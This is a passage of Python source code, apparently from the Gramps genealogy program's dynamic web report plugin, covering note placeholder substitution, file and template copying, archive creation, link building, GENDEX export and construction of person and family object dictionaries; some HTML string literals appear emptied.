self.get_note_format(self.database.get_note_from_gramps_id(note))\n\t\t\treturn(self.replace_note_fields(html))\n\t\treturn(\"\")\n\n\n\tdef replace_note_fields(self, html):\n\t\t\"\"\"\n\t\tModify the notes for HTML page generation.\n\t\tThis allows adding special features or computed data to the pages\n\t\t@param html: Note converted to HTML string\n\t\t@return: Modified string\n\t\t\"\"\"\n\t\ttext = html_text(html)\n\t\t# __SEARCH_FORM__ is replaced by a search form\n\t\ttext = text.replace(\"__SEARCH_FORM__\",\n\t\t\t\"\\n\")\n\t\t# __NB_INDIVIDUALS__ is replaced by the number of persons\n\t\t# __NB_FAMILIES__ is replaced by the number of families\n\t\t# __NB_MEDIA__ is replaced by the number of media objects\n\t\t# __NB_SOURCES__ is replaced by the number of sources\n\t\t# __NB_REPOSITORIES__ is replaced by the number of repositories\n\t\t# __NB_PLACES__ is replaced by the number of places\n\t\ttext = text.replace(\"__NB_INDIVIDUALS__\", str(len(self.obj_dict[Person])))\n\t\ttext = text.replace(\"__NB_FAMILIES__\", str(len(self.obj_dict[Family])))\n\t\ttext = text.replace(\"__NB_MEDIA__\", str(len(self.obj_dict[MediaObject])))\n\t\ttext = text.replace(\"__NB_SOURCES__\", str(len(self.obj_dict[Source])))\n\t\ttext = text.replace(\"__NB_REPOSITORIES__\", str(len(self.obj_dict[Repository])))\n\t\ttext = text.replace(\"__NB_PLACES__\", str(len(self.obj_dict[Place])))\n\t\t# __MEDIA___ is replaced by the media with gramps ID \n\t\t# __THUMB___ is replaced by the thumbnail of the media with gramps ID \n\t\ttext2 = text\n\t\tfor mo in re.finditer(r\"__(MEDIA|THUMB)_(.*?)__\", text):\n\t\t\tgid = mo.group(2)\n\t\t\tmedia = self.database.get_object_from_gramps_id(gid)\n\t\t\tif (not media): continue\n\t\t\ttm = mo.group(1)\n\t\t\tif (tm == \"THUMB\"):\n\t\t\t\tpath = self.copy_thumbnail(media)\n\t\t\t\ttext2 = (\n\t\t\t\t\ttext2[ : -(len(text) - mo.start(0))] +\n\t\t\t\t\t\"\" +\n\t\t\t\t\ttext2[-(len(text) - mo.end(0)) : ])\n\t\t\telse:\n\t\t\t\tpath = self.get_media_web_path(media)\n\t\t\t\ttext2 = (\n\t\t\t\t\ttext2[ : -(len(text) - mo.start(0))] 
+\n\t\t\t\t\t\"\" +\n\t\t\t\t\ttext2[-(len(text) - mo.end(0)) : ])\n\t\ttext = text2\n\t\t# __EXPORT_DATE__ is replaced by the current date\n\t\t# __GRAMPS_VERSION__ is replaced by the Gramps version\n\t\t# __GRAMPS_HOMEPAGE__ is replaced by the Gramps homepage\n\t\ttext = text.replace(\"__EXPORT_DATE__\", format_date(Today()))\n\t\ttext = text.replace(\"__GRAMPS_VERSION__\", VERSION)\n\t\ttext = text.replace(\"__GRAMPS_HOMEPAGE__\", \"Gramps\")\n\t\t# Relative URL are managed\n\t\ttext = text.replace(\"relative://relative.\", \"\")\n\t\t# __HOME_PERSON_NAME__ is replaced by the home person name\n\t\t# __HOME_PERSON_URL__ is replaced by the home person page URL\n\t\t# center_person = self.database.get_person_from_gramps_id(self.options['pid'])\n\t\t# if (center_person and (center_person.handle in self.obj_dict[Person])):\n\t\t\t# person_name = self.get_name(center_person)\n\t\t\t# person_url = \"person.html?idx=%i\" % self.obj_dict[Person][center_person.handle][OBJDICT_INDEX]\n\t\t\t# text = text.replace(\"__HOME_PERSON_NAME__\", person_name)\n\t\t\t# text = text.replace(\"__HOME_PERSON_URL__\", person_url)\n\t\treturn(text)\n\n\t\t\n\tdef get_copyright_license(self):\n\t\t\"\"\"\n\t\twill return either the text or image of the copyright license\n\t\t\"\"\"\n\t\ttext = \"\"\n\t\tif (self.copyright == 0):\n\t\t\tif self.author:\n\t\t\t\tyear = Today().get_year()\n\t\t\t\ttext = \"\" % {\n\t\t\t\t\t'person' : self.author,\n\t\t\t\t\t'year' : year}\n\t\telif (0 < self.copyright < len(_CC)):\n\t\t\turl = \"data/somerights20.gif\"\n\t\t\ttext = \"\"\n\t\t# return text or image to its callers\n\t\treturn(text)\n\n\n\tdef update_file(self, fout, txt, encoding = None):\n\t\t\"\"\"\n\t\tWrite a string in a file.\n\t\tThe file is not overwritten if the file exists and already contains the string \n\t\t@param fout: output file name\n\t\t@param txt: file contents\n\t\t@param encoding: encoding as passed to Python function codecs.open \n\t\t\"\"\"\n\t\tif (encoding is None): encoding = self.encoding\n\t\tf = os.path.join(self.target_path, fout)\n\t\tself.created_files.append(f)\n\t\tif (os.path.exists(f)):\n\t\t\ttry:\n\t\t\t\tfr = codecs.open(f, \"r\", encoding = encoding, errors=\"xmlcharrefreplace\")\n\t\t\t\ttxtr = fr.read()\n\t\t\t\tfr.close()\n\t\t\t\tif (txtr == txt):\n\t\t\t\t\tlog.info(\"File \\\"%s\\\" not overwritten (identical)\" % fout)\n\t\t\t\t\treturn\n\t\t\texcept:\n\t\t\t\tpass\n\t\tfw = codecs.open(f, \"w\", encoding = encoding, errors=\"xmlcharrefreplace\")\n\t\tfw.write(txt)\n\t\tfw.close()\n\t\tlog.info(\"File \\\"%s\\\" generated\" % fout)\n\n\tdef copy_file(self, from_fname, to_fname, to_dir=\"\"):\n\t\t\"\"\"\n\t\tCopy a file from a source to a (report) destination.\n\t\tIf to_dir is not present and if the target is not an archive,\n\t\tthen the destination directory will be created.\n\n\t\tNormally 'to_fname' will be just a filename, without directory path.\n\n\t\t'to_dir' is the relative path name in the destination root. 
It will\n\t\tbe prepended before 'to_fname'.\n\t\t\n\t\tThe file is not copied if the contents of 'from_fname' 'to_fname' are identical\n\t\t\"\"\"\n\t\t# log.debug(\"copying '%s' to '%s/%s'\" % (from_fname, to_dir, to_fname))\n\t\tdest = os.path.join(self.target_path, to_dir, to_fname)\n\t\tdestdir = os.path.dirname(dest)\n\t\tif not os.path.isdir(destdir):\n\t\t\tos.makedirs(destdir)\n\n\t\tif from_fname != dest:\n\t\t\ttry:\n\t\t\t\tdest_temp = dest + \".temp\"\n\t\t\t\tshutil.copyfile(from_fname, dest_temp)\n\t\t\t\tself.created_files.append(dest)\n\t\t\t\tif (os.path.exists(dest)):\n\t\t\t\t\tfr = codecs.open(dest, \"rb\")\n\t\t\t\t\told_bytes = fr.read()\n\t\t\t\t\tfr.close()\n\t\t\t\t\tfr = codecs.open(dest_temp, \"rb\")\n\t\t\t\t\tnew_bytes = fr.read()\n\t\t\t\t\tfr.close()\n\t\t\t\t\tif (old_bytes == new_bytes):\n\t\t\t\t\t\tos.remove(dest_temp)\n\t\t\t\t\t\tlog.info(\"File \\\"%s\\\" not overwritten (identical)\" % dest)\n\t\t\t\t\t\treturn\n\t\t\t\t\tos.remove(dest)\n\t\t\t\tos.rename(dest_temp, dest)\n\t\t\t\tlog.info(\"File \\\"%s\\\" generated\" % dest)\n\t\t\texcept:\n\t\t\t\tlog.warning(_(\"Copying error: %(error)s\") % {\"error\": sys.exc_info()[1]})\n\t\t\t\tlog.error(_(\"Impossible to copy \\\"%(src)s\\\" to \\\"%(dst)s\\\"\") % {\"src\": from_fname, \"dst\": to_fname})\n\t\telif self.warn_dir:\n\t\t\tself.user.warn(\n\t\t\t\t_(\"Possible destination error\") + \"\\n\" +\n\t\t\t\t_(\"You appear to have set your target directory \"\n\t\t\t\t \"to a directory used for data storage. This \"\n\t\t\t\t \"could create problems with file management. \"\n\t\t\t\t \"It is recommended that you consider using \"\n\t\t\t\t \"a different directory to store your generated \"\n\t\t\t\t \"web pages.\"))\n\t\t\tself.warn_dir = False\n\n\n\n\tdef copy_template_files(self):\n\t\t\"\"\"\n\t\tCopy the template files to the target directory\n\t\t\n\t\tThe template files are:\n\t\t - The files contained in the chosen template directory,\n\t\t - The files contained in the default template directory, unless they are also present in the chosen template directory\n\t\t\"\"\"\n\t\t# Get template path\n\t\ttmpl_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"templates\", WEB_TEMPLATE_LIST[self.template][0])\n\t\tdefault_tmpl_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"templates\", WEB_TEMPLATE_LIST[0][0])\n\t\ttry:\n\t\t\t# Copy template files\n\t\t\tself.copy_template_files_sub(tmpl_path)\n\t\t\t# Copy default template files if not already copied\n\t\t\tself.copy_template_files_sub(default_tmpl_path)\n\t\texcept:\n\t\t\tlog.error(_(\"Unable to copy web site template files from \\\"%(path)s\\\"\") % {\"path\": tmpl_path})\n\t\t\traise\n\t\t\t\n\tdef copy_template_files_sub(self, tmpl_path):\n\t\t\"\"\"\n\t\tCopy the template files from L{tmpl_path} to the target directory\n\t\tThe files already present in the target directory are not overwritten\n\t\t@param tmpl_path: template directory, as listed in L{WEB_TEMPLATE_LIST}\n\t\t\"\"\"\n\t\tfor (root, dirnames, files) in os.walk(tmpl_path):\n\t\t\tdst_path = root.replace(tmpl_path, self.target_path, 1)\n\t\t\t# Create sub-directories\n\t\t\tfor dirname in dirnames:\n\t\t\t\t# Remove files that have the same name as directories\n\t\t\t\tdstdirname = os.path.join(dst_path, dirname)\n\t\t\t\tif (os.path.isfile(dstdirname) or os.path.islink(dstdirname)):\n\t\t\t\t\tos.remove(dstdirname)\n\t\t\t\t# Create directory if needed\n\t\t\t\tif (not os.path.isdir(dstdirname)):\n\t\t\t\t\tos.mkdir(dstdirname)\n\t\t\t# Copy 
files\n\t\t\tfor file in files:\n\t\t\t\tsrc = os.path.join(root, file)\n\t\t\t\tdst = os.path.join(dst_path, file)\n\t\t\t\tif (dst in self.created_files):\n\t\t\t\t\t# File was already copied\n\t\t\t\t\tcontinue\n\t\t\t\tif (os.path.isfile(dst)):\n\t\t\t\t\t# If file already exists, check dates\n\t\t\t\t\tstat_src = os.stat(src)\n\t\t\t\t\tstat_dst = os.stat(dst)\n\t\t\t\t\t# If the source file is newer or the same age, delete the target so it is overwritten; otherwise keep the newer target\n\t\t\t\t\tif (stat_src.st_mtime >= stat_dst.st_mtime):\n\t\t\t\t\t\tos.remove(dst)\n\t\t\t\t\telse:\n\t\t\t\t\t\tlog.info(_(\"Keeping \\\"%(dst)s\\\" (newer than \\\"%(src)s\\\")\") % {'src': src, 'dst': dst})\n\t\t\t\tif (not os.path.exists(dst)):\n\t\t\t\t\tshutil.copyfile(src, dst)\n\t\t\t\t\tlog.info(_(\"Copying \\\"%(src)s\\\" to \\\"%(dst)s\\\"\") % {'src': src, 'dst': dst})\n\t\t\t\tself.created_files.append(dst)\n\n\n\tdef create_archive(self):\n\t\t\"\"\"\n\t\tCreate an archive of the whole web site\n\t\t\"\"\"\n\t\tif (not self.options['archive']): return\n\t\t\n\t\t# Get archive path and type\n\t\tarch_path = self.options['archive_file']\n\t\text = os.path.splitext(arch_path)[1].lower()\n\t\tif (ext not in [\".zip\", \".tgz\"]):\n\t\t\tarch_path += \".zip\"\n\t\t\text = \".zip\"\n\t\t\n\t\tif (os.path.isdir(arch_path)):\n\t\t\tlog.error(_('Invalid file name'))\n\t\t\tlog.error(_('The archive file must be a file, not a directory'))\n\t\t\treturn\n\t\t\t\n\t\t# Get base path for the files inside the archive\n\t\tbasepath = os.path.splitext(os.path.basename(arch_path))[0]\n\t\t\n\t\tif (ext == \".zip\"):\n\t\t\ttry:\n\t\t\t\tfzip = zipfile.ZipFile(arch_path, \"w\", zipfile.ZIP_DEFLATED, True)\n\t\t\texcept:\n\t\t\t\tlog.error(_(\"Unable to overwrite archive file \\\"%(path)s\\\"\") % {\"path\": arch_path})\n\t\t\t\traise\n\t\t\tfor file in self.created_files:\n\t\t\t\tarc_rel_path = file.replace(self.target_path, basepath, 1)\n\t\t\t\tif (sys.version_info[0] < 3):\n\t\t\t\t\tfile = file.encode(\"cp437\")\n\t\t\t\t\tarc_rel_path = arc_rel_path.encode(\"cp437\")\n\t\t\t\ttry:\n\t\t\t\t\tfzip.write(file, arc_rel_path)\n\t\t\t\texcept:\n\t\t\t\t\tlog.error(_(\"Unable to add file \\\"%(file)s\\\" to archive \\\"%(archive)s\\\"\") % {\"file\": file, \"archive\": arch_path})\n\t\t\t\t\traise\n\t\t\tfzip.close()\n\n\t\tif (ext == \".tgz\"):\n\t\t\ttry:\n\t\t\t\ttgz = tarfile.open(arch_path, \"w:gz\")\n\t\t\texcept:\n\t\t\t\tlog.error(_(\"Unable to overwrite archive file \\\"%(path)s\\\"\") % {\"path\": arch_path})\n\t\t\t\traise\n\t\t\tfor file in self.created_files:\n\t\t\t\tarc_rel_path = file.replace(self.target_path, basepath, 1)\n\t\t\t\ttry:\n\t\t\t\t\ttgz.add(file, arc_rel_path)\n\t\t\t\texcept:\n\t\t\t\t\tlog.error(_(\"Unable to add file \\\"%(file)s\\\" to archive \\\"%(archive)s\\\"\") % {\"file\": file, \"archive\": arch_path})\n\t\t\t\t\traise\n\t\t\ttgz.close()\n\n\n\tdef build_link(self, prop, handle, obj_class):\n\t\t\"\"\"\n\t\tBuild a link to an item.\n\t\t\n\t\tThis function is used when converting a Gramps note with hyperlinks into an HTML string\n\t\t\"\"\"\n\t\tif prop == \"gramps_id\":\n\t\t\tif obj_class in self.database.get_table_names():\n\t\t\t\tobj = self.database.get_table_metadata(obj_class)[\"gramps_id_func\"](handle)\n\t\t\t\tif obj:\n\t\t\t\t\thandle = obj.get_handle()\n\t\t\t\telse:\n\t\t\t\t\traise AttributeError(\"gramps_id '%s' not found in '%s'\" % (handle, obj_class))\n\t\t\telse:\n\t\t\t\traise AttributeError(\"invalid gramps_id lookup in table name '%s'\" % obj_class)\n\t\thref = 
\"search.html\"\n\t\ti = -1\n\t\tif (obj_class == \"Person\"):\n\t\t\thref = \"person.html\"\n\t\t\tif (handle in self.obj_dict[Person]):\n\t\t\t\thref = \"%s?idx=%i\" % (href, self.obj_dict[Person][handle][OBJDICT_INDEX])\n\t\telif (obj_class == \"Family\"):\n\t\t\thref = \"family.html\"\n\t\t\tif (handle in self.obj_dict[Family]):\n\t\t\t\thref = \"%s?fdx=%i\" % (href, self.obj_dict[Family][handle][OBJDICT_INDEX])\n\t\telif (obj_class == \"Source\"):\n\t\t\thref = \"source.html\"\n\t\t\tif (handle in self.obj_dict[Source]):\n\t\t\t\thref = \"%s?sdx=%i\" % (href, self.obj_dict[Source][handle][OBJDICT_INDEX])\n\t\telif (obj_class == \"Citation\"):\n\t\t\thref = \"source.html\"\n\t\t\tsource_handle = self.database.get_citation_from_handle(handle).get_reference_handle()\n\t\t\tif (source_handle in self.obj_dict[Source]):\n\t\t\t\thref = \"%s?sdx=%i\" % (href, self.obj_dict[Source][source_handle][OBJDICT_INDEX])\n\t\telif (obj_class == \"Repository\"):\n\t\t\thref = \"repository.html\"\n\t\t\tif (handle in self.obj_dict[Repository]):\n\t\t\t\thref = \"%s?rdx=%i\" % (href, self.obj_dict[Repository][handle][OBJDICT_INDEX])\n\t\telif (obj_class == \"Media\"):\n\t\t\thref = \"media.html\"\n\t\t\tif (handle in self.obj_dict[MediaObject]):\n\t\t\t\thref = \"%s?mdx=%i\" % (href, self.obj_dict[MediaObject][handle][OBJDICT_INDEX])\n\t\telif (obj_class == \"Place\"):\n\t\t\thref = \"place.html\"\n\t\t\tif (handle in self.obj_dict[Place]):\n\t\t\t\thref = \"%s?pdx=%i\" % (href, self.obj_dict[Place][handle][OBJDICT_INDEX])\n\t\telse:\n\t\t\tprint(_(\"DynamicWebReport ignoring link type '%(class)s'\") % {\"class\": obj_class})\n\t\treturn(href)\n\n\n\tdef _data_bkref_index(self, obj_class, obj_handle, ref_class):\n\t\t\"\"\"\n\t\tBuild a list of object indexes referencing a given object\n\t\t@param obj_class: Referenced object class\n\t\t@param obj_handle: Referenced object handle\n\t\t@param ref_class: Class of the referencing objects\n\t\t@return: String representing the Javascript Array of the object indexes (of class L{ref_class}) referencing a given object (L{obj_class}, L{obj_handle})\n\t\t\"\"\"\n\t\tbkref_list = self.bkref_dict[obj_class][obj_handle]\n\t\tif (not bkref_list): return (\"[]\")\n\t\t# Sort by referencing object name\n\t\tbkref_list = sorted(bkref_list, key = lambda bkref: self.obj_dict[bkref[BKREF_CLASS]][bkref[BKREF_HANDLE]][OBJDICT_NAME])\n\t\t# Filter bkref_list (keep only ref_class) and remove duplicates\n\t\tseen = set()\n\t\tbkref_list = [bkref_handle\n\t\t\tfor (bkref_class, bkref_handle, media_ref) in bkref_list\n\t\t\tif (bkref_class == ref_class and not (bkref_handle in seen or seen.add(bkref_handle)))]\n\t\treturn(\"[\" +\n\t\t\t\",\".join([str(self.obj_dict[ref_class][bkref_handle][OBJDICT_INDEX]) for bkref_handle in bkref_list]) +\n\t\t\t\"]\")\n\n\n\tdef _data_repo_backref_index(self, repo, ref_class):\n\t\t\"\"\"\n\t\tBuild a list of objects referencing a given repository, in the form:\n\t\t - object index (in table 'I', 'F', 'S')\n\t\t - media type\n\t\t - call number\n\t\t - notes of the repository reference\n\t\t@param repo: Referenced repository\n\t\t@param ref_class: Class of the referencing objects\n\t\t@return: String representing the Javascript Array of the references to L{repo}\n\t\t\"\"\"\n\t\trepo_handle = repo.get_handle()\n\t\tif (repo_handle not in self.obj_dict[Repository]): return(\"[]\")\n\t\tbkref_list = self.bkref_dict[Repository][repo_handle]\n\t\tif (not bkref_list): return (\"[]\")\n\t\tsep = \"\"\n\t\ttxt = \"[\"\n\t\tfor (bkref_class, bkref_handle, 
repo_ref) in bkref_list:\n\t\t\tif (ref_class != bkref_class): continue\n\t\t\ti = self.obj_dict[ref_class][bkref_handle][OBJDICT_INDEX]\n\t\t\tobject = self.get_object_from_handle(bkref_class, bkref_handle)\n\t\t\ttxt += sep + self._data_repo_ref(repo_ref, i)\n\t\t\tsep = \",\"\n\t\ttxt += \"]\"\n\t\treturn(txt)\n\n\tdef _data_media_backref_index(self, media, ref_class):\n\t\t\"\"\"\n\t\tBuild a list of objects referencing a given media, in the form:\n\t\t - object index (in table 'I', 'F', 'S')\n\t\t - media thumbnail path\n\t\t - [x1, y1, x2, y2] of the media reference\n\t\t - notes of the media reference\n\t\t - list of the media reference source citations index (in table 'C')\n\t\t@param media: Referenced media object\n\t\t@param ref_class: Class of the referencing objects\n\t\t@return: String representing the Javascript Array of the references to L{media}\n\t\t\"\"\"\n\t\tmedia_handle = media.get_handle()\n\t\tif (media_handle not in self.obj_dict[MediaObject]): return(\"[]\")\n\t\tbkref_list = self.bkref_dict[MediaObject][media_handle]\n\t\tif (not bkref_list): return (\"[]\")\n\t\tsep = \"\"\n\t\ttxt = \"[\"\n\t\tfor (bkref_class, bkref_handle, media_ref) in bkref_list:\n\t\t\tif (ref_class != bkref_class): continue\n\t\t\ti = self.obj_dict[ref_class][bkref_handle][OBJDICT_INDEX]\n\t\t\tobject = self.get_object_from_handle(bkref_class, bkref_handle)\n\t\t\ttxt += sep + self._data_media_ref(media_ref, i)\n\t\t\tsep = \",\"\n\t\ttxt += \"]\"\n\t\treturn(txt)\n\n\n\tdef get_object_from_handle(self, class_, handle):\n\t\t\"\"\"\n\t\tGet an object from its handle and class\n\t\t\"\"\"\n\t\tobject = None\n\t\tif (class_ == Person):\n\t\t\tobject = self.database.get_person_from_handle(handle)\n\t\telif (class_ == Family):\n\t\t\tobject = self.database.get_family_from_handle(handle)\n\t\telif (class_ == Event):\n\t\t\tobject = self.database.get_event_from_handle(handle)\n\t\telif (class_ == Source):\n\t\t\tobject = self.database.get_source_from_handle(handle)\n\t\telif (class_ == Citation):\n\t\t\tobject = self.database.get_citation_from_handle(handle)\n\t\telif (class_ == Place):\n\t\t\tobject = self.database.get_place_from_handle(handle)\n\t\telif (class_ == Repository):\n\t\t\tobject = self.database.get_repository_from_handle(handle)\n\t\treturn(object)\n\n\n\t##############################################################################################\n\t################################################################################## GENDEX data\n\t##############################################################################################\n\n\tdef build_gendex(self, ind_list):\n\t\tif (not self.inc_gendex): return\n\t\tfp_gendex = StringIO()\n\t\tfor person_handle in ind_list:\n\t\t\tself.write_gendex(fp_gendex, person_handle)\n\t\tself.update_file(\"gendex.txt\", fp_gendex.getvalue())\n\n\tdef write_gendex(self, fp, person_handle):\n\t\t\"\"\"\n\t\tReference|SURNAME|given name /SURNAME/|date of birth|place of birth|date of death|place of death|\n\t\t* field 1: file name of web page referring to the individual\n\t\t* field 2: surname of the individual\n\t\t* field 3: full name of the individual\n\t\t* field 4: date of birth or christening (optional)\n\t\t* field 5: place of birth or christening (optional)\n\t\t* field 6: date of death or burial (optional)\n\t\t* field 7: place of death or burial (optional) \n\t\t\"\"\"\n\t\tif (not(person_handle and (person_handle in self.obj_dict[Person]))): return\n\t\tperson = self.database.get_person_from_handle(person_handle)\n\t\turl = 
\"person.html?idx=%i\" % self.obj_dict[Person][person_handle][OBJDICT_INDEX]\n\t\tsurname = person.get_primary_name().get_surname()\n\t\tfullname = person.get_primary_name().get_gedcom_name()\n\t\t\n\t\t# get birth info:\n\t\t(dob, pob) = self.get_gendex_data(person.get_birth_ref())\n\t\t\n\t\t# get death info:\n\t\t(dod, pod) = self.get_gendex_data(person.get_death_ref())\n\t\tfp.write(\n\t\t\t'|'.join((url, surname, fullname, dob, pob, dod, pod)) + '|\\n')\n\n\tdef get_gendex_data(self, event_ref):\n\t\t\"\"\"\n\t\tGiven an event, return the date and place as strings\n\t\t\"\"\"\n\t\tdoe = \"\" # date of event\n\t\tpoe = \"\" # place of event\n\t\tif (event_ref):\n\t\t\tevent = self.database.get_event_from_handle(event_ref.ref)\n\t\t\tif (event):\n\t\t\t\tdate = event.get_date_object()\n\t\t\t\tdoe = format_date(date, gedcom = True)\n\t\t\t\tif (event.get_place_handle()):\n\t\t\t\t\tplace_handle = event.get_place_handle()\n\t\t\t\t\tif (place_handle):\n\t\t\t\t\t\tplace = self.database.get_place_from_handle(place_handle)\n\t\t\t\t\t\tif (place):\n\t\t\t\t\t\t\tif (DWR_VERSION_412):\n\t\t\t\t\t\t\t\tpoe = _pd.display(self.database, place)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tpoe = place.get_title()\n\t\treturn(doe, poe)\n\t\t\n\n\t##############################################################################################\n\t##############################################################################################\n\t#\n\t# Objects dictionaries construction\n\t#\n\t##############################################################################################\n\t##############################################################################################\n\n\tdef _build_obj_dict(self):\n\t\t\"\"\"\n\t\tConstruct the dictionaries of objects to be included in the reports. There\n\t\tare two dictionaries, which have the same structure: they are two level\n\t\tdictionaries, the first key is the class of object (e.g. 
gen.lib.Person).\n\t\tThe second key is the handle of the object.\n\n\t\tFor the obj_dict, the value is a tuple containing:\n\t\t - the gramps_id\n\t\t - the text name for the object\n\t\t - the index (number starting at 0)\n\n\t\tFor the bkref_dict, the value is a tuple containing:\n\t\t - the class of object that refers to the 'key' object\n\t\t - the handle for the object that refers to the 'key' object\n\t\t - the reference object:\n\t\t\t- None in most cases\n\t\t\t- for media it is a MediaRef object\n\t\t\n\t\tThis method recursively calls the methods \"_add_***\"\n\t\t\"\"\"\n\t\t_obj_class_list = (Person, Family, Event, Place, Source, Citation,\n\t\t\t\t\t\t MediaObject, Repository, Note, Tag)\n\n\t\t# setup a dictionary of the required structure\n\t\tself.obj_dict = defaultdict(lambda: defaultdict(set))\n\t\tself.bkref_dict = defaultdict(lambda: defaultdict(set))\n\n\n\t\t# initialise the dictionary to empty in case no objects of any\n\t\t# particular class are included in the web report\n\t\tfor obj_class in _obj_class_list:\n\t\t\tself.obj_dict[obj_class] = defaultdict(set)\n\n\t\tind_list = self.database.iter_person_handles()\n\t\twith self.user.progress(_(\"Dynamic Web Site Report\"),\n\t\t\t\t\t\t\t\t _(\"Applying Person Filter...\"),\n\t\t\t\t\t\t\t\t self.database.get_number_of_people()) as step:\n\t\t\tind_list = self.filter.apply(self.database, ind_list,\n\t\t\t\t\t\t\t\t\t\t step)\n\n\t\twith self.user.progress(_(\"Dynamic Web Site Report\"),\n\t\t\t\t\t\t\t\t _(\"Constructing list of other objects...\"),\n\t\t\t\t\t\t\t\t sum(1 for _ in ind_list)) as step:\n\t\t\tfor handle in ind_list:\n\t\t\t\t# FIXME work around bug that self.database.iter under python 3\n\t\t\t\t# returns (binary) data rather than text\n\t\t\t\tif (not isinstance(handle, UNITYPE)):\n\t\t\t\t\thandle = handle.decode(\"UTF-8\")\n\t\t\t\tstep()\n\t\t\t\tself._add_person(handle, \"\", \"\")\n\n\t\tlog.debug(\"final object dictionary \\n\" +\n\t\t\t\t \"\".join((\"%s: %s\\n\" % item) for item in self.obj_dict.items()))\n\n\t\tlog.debug(\"final backref dictionary \\n\" +\n\t\t\t\t \"\".join((\"%s: %s\\n\" % item) for item in self.bkref_dict.items()))\n\n\n\tdef _add_person(self, person_handle, bkref_class, bkref_handle):\n\t\t\"\"\"\n\t\tAdd person_handle to the L{self.obj_dict}, and recursively all referenced objects\n\t\t\"\"\"\n\t\t# Update the dictionaries of objects back references\n\t\tself.bkref_dict[Person][person_handle].add((bkref_class, bkref_handle, None))\n\t\t# Check if the person is already added\n\t\tif (person_handle in self.obj_dict[Person]): return\n\t\t# Add person in the dictionaries of objects\n\t\tperson = self.database.get_person_from_handle(person_handle)\n\t\tif (not person): return\n\t\tperson_name = self.get_person_name(person)\n\t\tself.obj_dict[Person][person_handle] = [person_name, person.gramps_id, len(self.obj_dict[Person])]\n\t\t# Person events\n\t\tevt_ref_list = person.get_event_ref_list()\n\t\tif evt_ref_list:\n\t\t\tfor evt_ref in evt_ref_list:\n\t\t\t\tself._add_event(evt_ref.ref, Person, person_handle, evt_ref)\n\t\t# Person citations\n\t\tfor citation_handle in person.get_citation_list():\n\t\t\tself._add_citation(citation_handle, Person, person_handle)\n\t\t# Person name citations\n\t\tfor name in [person.get_primary_name()] + \\\n\t\t\t\t\t\tperson.get_alternate_names():\n\t\t\tfor citation_handle in name.get_citation_list():\n\t\t\t\tself._add_citation(citation_handle, Person, person_handle)\n\t\t# LDS Ordinance citations\n\t\tfor lds_ord in 
person.get_lds_ord_list():\n\t\t\tfor citation_handle in lds_ord.get_citation_list():\n\t\t\t\tself._add_citation(citation_handle, Person, person_handle)\n\t\t# Attribute citations\n\t\tfor attr in person.get_attribute_list():\n\t\t\tfor citation_handle in attr.get_citation_list():\n\t\t\t\tself._add_citation(citation_handle, Person, person_handle)\n\t\t# Person families\n\t\tfamily_handle_list = person.get_family_handle_list()\n\t\tif family_handle_list:\n\t\t\tfor family_handle in person.get_family_handle_list():\n\t\t\t\tself._add_family(family_handle, Person, person_handle)\n\t\t# Person media\n\t\tfor media_ref in person.get_media_list():\n\t\t\tmedia_handle = media_ref.get_reference_handle()\n\t\t\tself._add_media(media_handle, Person, person_handle, media_ref)\n\t\t# Association citations\n\t\tfor assoc in person.get_person_ref_list():\n\t\t\tfor citation_handle in assoc.get_citation_list():\n\t\t\t\tself._add_citation(citation_handle, Person, person_handle)\n\t\t# Addresses citations\n\t\tfor addr in person.get_address_list():\n\t\t\tfor citation_handle in addr.get_citation_list():\n\t\t\t\tself._add_citation(citation_handle, Person, person_handle)\n\n\n\tdef get_person_name(self, person):\n\t\t\"\"\"\n\t\tReturn a string containing the person's primary name in the name format chosen in the web report options\n\t\t@param: person -- person object from database\n\t\t\"\"\"\n\t\tname_format = self.options['name_format']\n\t\tprimary_name = person.get_primary_name()\n\t\tname = Name(primary_name)\n\t\tname.set_display_as(name_format)\n\t\treturn _nd.display_name(name)\n\n\n\tdef _add_family(self, family_handle, bkref_class, bkref_handle):\n\t\t\"\"\"\n\t\tAdd family_handle to the L{self.obj_dict}, and recursively all referenced objects\n\t\t\"\"\"\n\t\t# Update the dictionaries of objects back references\n\t\tself.bkref_dict[Family][family_handle].add((bkref_class, bkref_handle, None))\n\t\t# Check if the family is already added\n\t\tif (family_handle in self.obj_dict[Family]): return\n\t\t# Add family in the dictionaries of objects\n\t\tfamily = self.database.get_family_from_handle(family_handle)\n\t\tfamily_name = self.get_family_name(family)\n\t\tself.obj_dict[Family][family_handle] = [family_name, family.gramps_id, len(self.obj_dict[Family])]\n\t\t# Family events\n\t\tevt_ref_list = family.get_event_ref_list()\n\t\tif evt_ref_list:\n\t\t\tfor evt_ref in evt_ref_list:\n\t\t\t\tself._add_event(evt_ref.ref, Family, family_handle, evt_ref)\n\t\t# Family child references\n\t\tfor child_ref in family.get_child_ref_list():\n\t\t\tfor citation_handle in child_ref.get_citation_list():\n\t\t\t\tself._add_citation(citation_handle, Family, family_handle)\n\t\t# LDS Ordinance citations\n\t\tfor lds_ord in family.get_lds_ord_list():\n\t\t\tfor citation_handle in lds_ord.get_citation_list():\n\t\t\t\tself._add_citation(citation_handle, Family, family_handle)\n\t\t# Attributes citations\n\t\tfor attr in family.get_attribute_list():\n\t\t\tfor citation_handle in attr.get_citation_list():\n\t\t\t\tself._add_citation(citation_handle, Family, family_handle)\n\t\t# Family citations\n\t\tfor citation_handle in family.get_citation_list():\n\t\t\tself._add_citation(citation_handle, Family, family_handle)\n\t\t# Family media\n\t\tfor media_ref in family.get_media_list():\n\t\t\tmedia_handle = media_ref.get_reference_handle()\n\t\t\tself._add_media(media_handle, Family, family_handle, media_ref)\n\n\n\tdef get_family_name(self, family):\n\t\t\"\"\"\n\t\tReturn a string containing the name of the family 
